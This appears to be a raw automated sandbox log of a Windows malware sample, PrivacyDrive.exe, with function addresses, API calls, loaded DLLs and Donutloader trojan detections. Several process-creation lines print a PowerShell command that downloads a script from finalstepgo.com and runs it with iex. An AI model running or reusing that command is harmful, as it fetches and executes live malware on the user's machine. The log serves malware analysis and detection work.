Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 8_2_00F798B2 8_2_00F798B2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 8_2_00F7E802 8_2_00F7E802
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 8_2_00F9B99B 8_2_00F9B99B
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 8_2_00F7CAE2 8_2_00F7CAE2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 8_2_00F7DA82 8_2_00F7DA82
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 8_2_00FA9A42 8_2_00FA9A42
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 8_2_00F73A08 8_2_00F73A08
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 8_2_00F90B95 8_2_00F90B95
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 8_2_00F72CB5 8_2_00F72CB5
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 8_2_00FAFCA2 8_2_00FAFCA2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 8_2_00FB9DB2 8_2_00FB9DB2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 8_2_00F72D5B 8_2_00F72D5B
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 8_2_00F76EFD 8_2_00F76EFD
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 8_2_00F7BEE2 8_2_00F7BEE2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 8_2_00F76EB2 8_2_00F76EB2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 8_2_00F78EB2 8_2_00F78EB2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 8_2_00F72E8E 8_2_00F72E8E
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 8_2_00F72E1A 8_2_00F72E1A
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 8_2_00F72FB3 8_2_00F72FB3
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 8_2_00F7CF72 8_2_00F7CF72
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 8_2_011EF193 8_2_011EF193
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 8_2_011D2006 8_2_011D2006
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 8_2_01208040 8_2_01208040
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 8_2_011DC080 8_2_011DC080
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 8_2_011DB0E0 8_2_011DB0E0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 8_2_011D1359 8_2_011D1359
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 8_2_012183B0 8_2_012183B0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 8_2_0120E2A0 8_2_0120E2A0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 8_2_011D12B3 8_2_011D12B3
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 8_2_011DB570 8_2_011DB570
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 8_2_011D15B1 8_2_011D15B1
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 8_2_011D1418 8_2_011D1418
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 8_2_011D148C 8_2_011D148C
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 8_2_011D54B0 8_2_011D54B0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 8_2_011D74B0 8_2_011D74B0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 8_2_011D54FB 8_2_011D54FB
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 8_2_011DA4E0 8_2_011DA4E0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 8_2_011E17C0 8_2_011E17C0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 8_2_012066E0 8_2_012066E0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 8_2_01206970 8_2_01206970
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 8_2_011D3890 8_2_011D3890
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 8_2_0121A8B0 8_2_0121A8B0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 8_2_01207D90 8_2_01207D90
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 8_2_011FBC50 8_2_011FBC50
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 8_2_011F9F99 8_2_011F9F99
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 8_2_011DCE00 8_2_011DCE00
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 8_2_011D7EB0 8_2_011D7EB0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: String function: 00424910 appears 45 times
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: String function: 00418CF0 appears 92 times
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: String function: 004FFB7D appears 31 times
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: String function: 00F80862 appears 145 times
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: String function: 011DEE60 appears 145 times
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: String function: 00439540 appears 36 times
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: String function: 051ACBE0 appears 83 times
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: String function: 00F7E5E2 appears 89 times
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: String function: 00F8E5E2 appears 89 times
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: String function: 0041F120 appears 65 times
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: String function: 011DCBE0 appears 93 times
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: String function: 00406E50 appears 178 times
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: String function: 051AEE60 appears 122 times
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: String function: 004C24A0 appears 135 times
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: String function: 0045EC80 appears 107 times
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: String function: 0052CF10 appears 37 times
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: String function: 00407150 appears 69 times
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: String function: 0045EEC0 appears 42 times
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: String function: 00F90862 appears 145 times
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: String function: 004FFB4F appears 47 times
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: String function: 00418AC0 appears 74 times
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2504 -s 1760
Source: 00000008.00000002.2150163916.0000000000F70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000004.00000002.2151875122.0000000000F80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: classification engine Classification label: mal100.troj.evad.win@13/30@4/3
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4_2_004030E0 PeekMessageW,PeekMessageW,PeekMessageW,PeekMessageW,PeekMessageW,PeekMessageW,PeekMessageW,GetLastError,FormatMessageW,LocalFree, 4_2_004030E0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4_2_004D3270 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,CloseHandle,AdjustTokenPrivileges,CloseHandle,GetLastError, 4_2_004D3270
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4_2_0043E991 GetVolumeInformationW,GetDiskFreeSpaceExW, 4_2_0043E991
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: OpenSCManagerW,OpenSCManagerW,CloseServiceHandle,CloseServiceHandle,OpenSCManagerW,CloseServiceHandle,OpenSCManagerW,CloseServiceHandle,OpenSCManagerW,OpenSCManagerW,CreateServiceW,ChangeServiceConfig2W,CloseServiceHandle,CloseServiceHandle,OpenSCManagerW,CreateServiceW,ChangeServiceConfig2W,CloseServiceHandle,CloseServiceHandle,GetLastError, 4_2_0041D320
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: CreateServiceW,ChangeServiceConfig2W,SetLastError, 4_2_0041CE80
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4_2_00F80C6F CreateToolhelp32Snapshot,Thread32First,Wow64SuspendThread,CloseHandle,CloseHandle, 4_2_00F80C6F
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4_2_051DF006 CoCreateInstance, 4_2_051DF006
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4_2_004D3220 FindResourceW,SizeofResource,LoadResource,LockResource, 4_2_004D3220
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4_2_0041D320 OpenSCManagerW,OpenSCManagerW,CloseServiceHandle,CloseServiceHandle,OpenSCManagerW,CloseServiceHandle,OpenSCManagerW,CloseServiceHandle,OpenSCManagerW,OpenSCManagerW,CreateServiceW,ChangeServiceConfig2W,CloseServiceHandle,CloseServiceHandle,OpenSCManagerW,CreateServiceW,ChangeServiceConfig2W,CloseServiceHandle,CloseServiceHandle,GetLastError, 4_2_0041D320
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\OIlqJYuE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2504
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6908:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess764
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_anvhf53m.wns.ps1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe cmd /C ""PowerShell.exe" -command $url = 'https://finalstepgo.com/uploads/il2.txt'; $response = Invoke-WebRequest -Uri $url -UseBasicParsing; $text = $response.Content; iex $text"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "PowerShell.exe" -command $url = 'https://finalstepgo.com/uploads/il2.txt'; $response = Invoke-WebRequest -Uri $url -UseBasicParsing; $text = $response.Content; iex $text
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe "C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe"
Source: unknown Process created: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe "C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe"
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2504 -s 1760
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2504 -s 1740
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2504 -s 1696
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2504 -s 1716
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 764 -s 1728
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "PowerShell.exe" -command $url = 'https://finalstepgo.com/uploads/il2.txt'; $response = Invoke-WebRequest -Uri $url -UseBasicParsing; $text = $response.Content; iex $text
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe "C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: bitsproxy.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kdscli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe Section loaded: qmgr.dll
Source: C:\Windows\System32\svchost.exe Section loaded: bitsperf.dll
Source: C:\Windows\System32\svchost.exe Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe Section loaded: firewallapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: esent.dll
Source: C:\Windows\System32\svchost.exe Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: fwbase.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe Section loaded: bitsigd.dll
Source: C:\Windows\System32\svchost.exe Section loaded: upnp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ssdpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wsmauto.dll
Source: C:\Windows\System32\svchost.exe Section loaded: miutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wsmsvc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pcwum.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wkscli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exe Section loaded: webio.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe Section loaded: rmclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: usermgrcli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: execmodelclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: propsys.dll
Source: C:\Windows\System32\svchost.exe Section loaded: coremessaging.dll
Source: C:\Windows\System32\svchost.exe Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\svchost.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\svchost.exe Section loaded: execmodelproxy.dll
Source: C:\Windows\System32\svchost.exe Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: vssapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: vsstrace.dll
Source: C:\Windows\System32\svchost.exe Section loaded: samcli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: samlib.dll
Source: C:\Windows\System32\svchost.exe Section loaded: es.dll
Source: C:\Windows\System32\svchost.exe Section loaded: bitsproxy.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: schannel.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Section loaded: webio.dll
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Section loaded: cryptsp.dll
